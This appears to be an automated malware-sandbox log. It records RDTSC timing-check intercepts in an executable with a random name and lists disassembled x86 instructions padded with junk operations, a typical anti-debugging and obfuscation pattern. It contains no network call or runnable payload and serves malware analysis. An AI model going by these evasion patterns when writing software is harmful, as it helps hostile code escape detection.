Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7081C second address: 6F70880 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 jmp 00007F5BD0FFF0CEh 0x00000015 mov word ptr [esi+32h], ax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov dl, 12h 0x0000001e pushfd 0x0000001f jmp 00007F5BD0FFF0D6h 0x00000024 and cx, 84A8h 0x00000029 jmp 00007F5BD0FFF0CBh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70880 second address: 6F70898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0C7BA74h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70898 second address: 6F708F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+0000008Ch] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007F5BD0FFF0CBh 0x00000019 pop eax 0x0000001a pushfd 0x0000001b jmp 00007F5BD0FFF0D9h 0x00000020 adc eax, 1D5550D6h 0x00000026 jmp 00007F5BD0FFF0D1h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70A59 second address: 6F70AF9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5BD0C7BA6Dh 0x00000008 sbb ah, FFFFFF96h 0x0000000b jmp 00007F5BD0C7BA71h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov dword ptr [esi+40h], eax 0x00000017 jmp 00007F5BD0C7BA6Eh 0x0000001c lea eax, dword ptr [ebx+00000080h] 0x00000022 pushad 0x00000023 mov cl, 98h 0x00000025 popad 0x00000026 push 00000001h 0x00000028 jmp 00007F5BD0C7BA74h 0x0000002d nop 0x0000002e jmp 00007F5BD0C7BA70h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov edx, esi 0x00000039 pushfd 0x0000003a jmp 00007F5BD0C7BA78h 0x0000003f jmp 00007F5BD0C7BA75h 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70AF9 second address: 6F70B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F5BD0FFF0CEh 0x0000000f lea eax, dword ptr [ebp-10h] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5BD0FFF0CCh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70B2F second address: 6F70B99 instructions: 0x00000000 rdtsc 0x00000002 call 00007F5BD0C7BA72h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5BD0C7BA6Bh 0x0000000f popad 0x00000010 nop 0x00000011 pushad 0x00000012 mov ecx, 2C0F426Bh 0x00000017 pushfd 0x00000018 jmp 00007F5BD0C7BA70h 0x0000001d adc ah, FFFFFFF8h 0x00000020 jmp 00007F5BD0C7BA6Bh 0x00000025 popfd 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov dh, al 0x0000002d call 00007F5BD0C7BA77h 0x00000032 pop esi 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70B99 second address: 6F70BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0FFF0D5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70BB2 second address: 6F70BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70BB6 second address: 6F70BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5BD0FFF0D8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70BD9 second address: 6F70BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0C7BA6Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70BEB second address: 6F70BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70C2D second address: 6F70CA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b pushad 0x0000000c mov cx, 2B23h 0x00000010 push esi 0x00000011 pushfd 0x00000012 jmp 00007F5BD0C7BA6Fh 0x00000017 xor ecx, 5909E84Eh 0x0000001d jmp 00007F5BD0C7BA79h 0x00000022 popfd 0x00000023 pop ecx 0x00000024 popad 0x00000025 js 00007F5C3FE4A48Dh 0x0000002b jmp 00007F5BD0C7BA77h 0x00000030 mov eax, dword ptr [ebp-0Ch] 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70CA2 second address: 6F70CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70CA6 second address: 6F70CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70CAC second address: 6F70D20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BD0FFF0D8h 0x00000009 sub cx, 6A58h 0x0000000e jmp 00007F5BD0FFF0CBh 0x00000013 popfd 0x00000014 mov bx, ax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+04h], eax 0x0000001d pushad 0x0000001e call 00007F5BD0FFF0D0h 0x00000023 pushad 0x00000024 popad 0x00000025 pop ecx 0x00000026 movsx edi, ax 0x00000029 popad 0x0000002a lea eax, dword ptr [ebx+78h] 0x0000002d pushad 0x0000002e mov si, E285h 0x00000032 push esi 0x00000033 movsx ebx, cx 0x00000036 pop ecx 0x00000037 popad 0x00000038 push 00000001h 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F5BD0FFF0D4h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70D20 second address: 6F70DBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F5BD0C7BA76h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F5BD0C7BA77h 0x00000018 and ah, FFFFFFEEh 0x0000001b jmp 00007F5BD0C7BA79h 0x00000020 popfd 0x00000021 push eax 0x00000022 pop edx 0x00000023 popad 0x00000024 jmp 00007F5BD0C7BA6Ch 0x00000029 popad 0x0000002a nop 0x0000002b jmp 00007F5BD0C7BA70h 0x00000030 lea eax, dword ptr [ebp-08h] 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F5BD0C7BA77h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70E1D second address: 6F70E28 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 mov cl, bl 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70E28 second address: 6F70E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov edi, eax 0x00000007 pushad 0x00000008 mov esi, ebx 0x0000000a pushad 0x0000000b movsx edi, cx 0x0000000e mov ch, 56h 0x00000010 popad 0x00000011 popad 0x00000012 test edi, edi 0x00000014 pushad 0x00000015 mov dx, 83B6h 0x00000019 mov edi, 7AE22542h 0x0000001e popad 0x0000001f js 00007F5C3FE4A2B8h 0x00000025 pushad 0x00000026 mov si, 0EC1h 0x0000002a popad 0x0000002b mov eax, dword ptr [ebp-04h] 0x0000002e jmp 00007F5BD0C7BA6Ch 0x00000033 mov dword ptr [esi+08h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70E6B second address: 6F70E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70E6F second address: 6F70E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70E8C second address: 6F70EDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c jmp 00007F5BD0FFF0CEh 0x00000011 push 00000001h 0x00000013 jmp 00007F5BD0FFF0D0h 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5BD0FFF0D7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70EDE second address: 6F70EE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70EE4 second address: 6F70EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70EE8 second address: 6F70EF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70EF6 second address: 6F70EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70EFD second address: 6F70F78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov di, si 0x0000000e mov ebx, eax 0x00000010 popad 0x00000011 lea eax, dword ptr [ebp-18h] 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007F5BD0C7BA70h 0x0000001b push esi 0x0000001c pop edi 0x0000001d popad 0x0000001e jmp 00007F5BD0C7BA6Eh 0x00000023 popad 0x00000024 nop 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F5BD0C7BA6Eh 0x0000002c sub si, 3448h 0x00000031 jmp 00007F5BD0C7BA6Bh 0x00000036 popfd 0x00000037 popad 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F5BD0C7BA6Eh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70F78 second address: 6F70F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70F7C second address: 6F70F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70FC4 second address: 6F70FCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70FCA second address: 6F70FE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, eax 0x0000000d pushad 0x0000000e mov edi, eax 0x00000010 popad 0x00000011 test edi, edi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov dx, si 0x00000019 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70FE9 second address: 6F7102B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F5BD0FFF0CEh 0x00000009 movzx eax, dx 0x0000000c pop edx 0x0000000d popad 0x0000000e js 00007F5C401CD755h 0x00000014 jmp 00007F5BD0FFF0CAh 0x00000019 mov eax, dword ptr [ebp-14h] 0x0000001c pushad 0x0000001d mov edx, ecx 0x0000001f mov eax, 2C4EE779h 0x00000024 popad 0x00000025 mov ecx, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F5BD0FFF0CBh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7102B second address: 6F71043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0C7BA74h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F71043 second address: 6F71047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F71047 second address: 6F7105E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5BD0C7BA6Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7105E second address: 6F710A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, 761C06ECh 0x0000000e jmp 00007F5BD0FFF0D6h 0x00000013 sub eax, eax 0x00000015 jmp 00007F5BD0FFF0D1h 0x0000001a lock cmpxchg dword ptr [edx], ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F710A5 second address: 6F710B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F710B8 second address: 6F71168 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BD0FFF0CFh 0x00000009 sub ax, 06EEh 0x0000000e jmp 00007F5BD0FFF0D9h 0x00000013 popfd 0x00000014 push esi 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop edi 0x0000001a jmp 00007F5BD0FFF0CAh 0x0000001f test eax, eax 0x00000021 jmp 00007F5BD0FFF0D0h 0x00000026 jne 00007F5C401CD676h 0x0000002c pushad 0x0000002d mov ebx, eax 0x0000002f push ecx 0x00000030 pushfd 0x00000031 jmp 00007F5BD0FFF0D9h 0x00000036 sub ax, 7F36h 0x0000003b jmp 00007F5BD0FFF0D1h 0x00000040 popfd 0x00000041 pop eax 0x00000042 popad 0x00000043 mov edx, dword ptr [ebp+08h] 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 mov bx, ax 0x0000004c call 00007F5BD0FFF0D4h 0x00000051 pop eax 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F71168 second address: 6F7116E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7116E second address: 6F71172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F71172 second address: 6F711BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi] 0x0000000a pushad 0x0000000b mov esi, 1944171Bh 0x00000010 mov di, ax 0x00000013 popad 0x00000014 mov dword ptr [edx], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov eax, ebx 0x0000001b pushfd 0x0000001c jmp 00007F5BD0C7BA6Bh 0x00000021 sub ecx, 616B227Eh 0x00000027 jmp 00007F5BD0C7BA79h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F711BA second address: 6F711C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F711C0 second address: 6F711C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F711C4 second address: 6F711E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov edi, 5DFD5B54h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F711E8 second address: 6F71209 instructions: 0x00000000 rdtsc 0x00000002 mov bx, D8C0h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5BD0C7BA71h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F71209 second address: 6F7120F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7120F second address: 6F71214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F71214 second address: 6F71259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F5BD0FFF0D8h 0x0000000a sbb ax, B168h 0x0000000f jmp 00007F5BD0FFF0CBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [esi+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007F5BD0FFF0CBh 0x00000023 mov ebx, esi 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F71259 second address: 6F712D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 jmp 00007F5BD0C7BA6Ch 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [edx+08h], eax 0x00000011 pushad 0x00000012 mov si, 480Dh 0x00000016 mov ax, 5809h 0x0000001a popad 0x0000001b mov eax, dword ptr [esi+0Ch] 0x0000001e pushad 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F5BD0C7BA70h 0x00000026 xor ax, 4958h 0x0000002b jmp 00007F5BD0C7BA6Bh 0x00000030 popfd 0x00000031 movzx esi, di 0x00000034 popad 0x00000035 pushfd 0x00000036 jmp 00007F5BD0C7BA75h 0x0000003b jmp 00007F5BD0C7BA6Bh 0x00000040 popfd 0x00000041 popad 0x00000042 mov dword ptr [edx+0Ch], eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F712D2 second address: 6F712ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F712ED second address: 6F71337 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+10h] 0x0000000c jmp 00007F5BD0C7BA6Eh 0x00000011 mov dword ptr [edx+10h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F5BD0C7BA77h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F71337 second address: 6F71371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esi+14h] 0x00000009 jmp 00007F5BD0FFF0D7h 0x0000000e mov dword ptr [edx+14h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5BD0FFF0D5h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F71371 second address: 6F71377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F71377 second address: 6F7137B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7137B second address: 6F71460 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+18h] 0x0000000e pushad 0x0000000f call 00007F5BD0C7BA74h 0x00000014 pushfd 0x00000015 jmp 00007F5BD0C7BA72h 0x0000001a add eax, 43DFDC58h 0x00000020 jmp 00007F5BD0C7BA6Bh 0x00000025 popfd 0x00000026 pop ecx 0x00000027 mov bx, 719Ch 0x0000002b popad 0x0000002c mov dword ptr [edx+18h], eax 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F5BD0C7BA71h 0x00000036 jmp 00007F5BD0C7BA6Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov eax, dword ptr [esi+1Ch] 0x00000040 jmp 00007F5BD0C7BA75h 0x00000045 mov dword ptr [edx+1Ch], eax 0x00000048 jmp 00007F5BD0C7BA6Eh 0x0000004d mov eax, dword ptr [esi+20h] 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 pushfd 0x00000054 jmp 00007F5BD0C7BA6Dh 0x00000059 sbb eax, 1B9A7AB6h 0x0000005f jmp 00007F5BD0C7BA71h 0x00000064 popfd 0x00000065 jmp 00007F5BD0C7BA70h 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F71460 second address: 6F714CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BD0FFF0D1h 0x00000008 pushfd 0x00000009 jmp 00007F5BD0FFF0D0h 0x0000000e add ecx, 59C17038h 0x00000014 jmp 00007F5BD0FFF0CBh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [edx+20h], eax 0x00000020 jmp 00007F5BD0FFF0D6h 0x00000025 mov eax, dword ptr [esi+24h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F5BD0FFF0D7h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F714CF second address: 6F714D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F714D5 second address: 6F714D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F714D9 second address: 6F71506 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b jmp 00007F5BD0C7BA77h 0x00000010 mov eax, dword ptr [esi+28h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edx 0x00000017 pop eax 0x00000018 mov ecx, ebx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F71506 second address: 6F71519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0FFF0CFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F71519 second address: 6F7157C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+28h], eax 0x0000000e jmp 00007F5BD0C7BA6Eh 0x00000013 mov ecx, dword ptr [esi+2Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 call 00007F5BD0C7BA6Dh 0x0000001e pop esi 0x0000001f pushfd 0x00000020 jmp 00007F5BD0C7BA71h 0x00000025 jmp 00007F5BD0C7BA6Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7157C second address: 6F715BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+2Ch], ecx 0x0000000c pushad 0x0000000d mov al, 07h 0x0000000f popad 0x00000010 mov ax, word ptr [esi+30h] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 call 00007F5BD0FFF0D7h 0x0000001c pop ecx 0x0000001d rdtsc
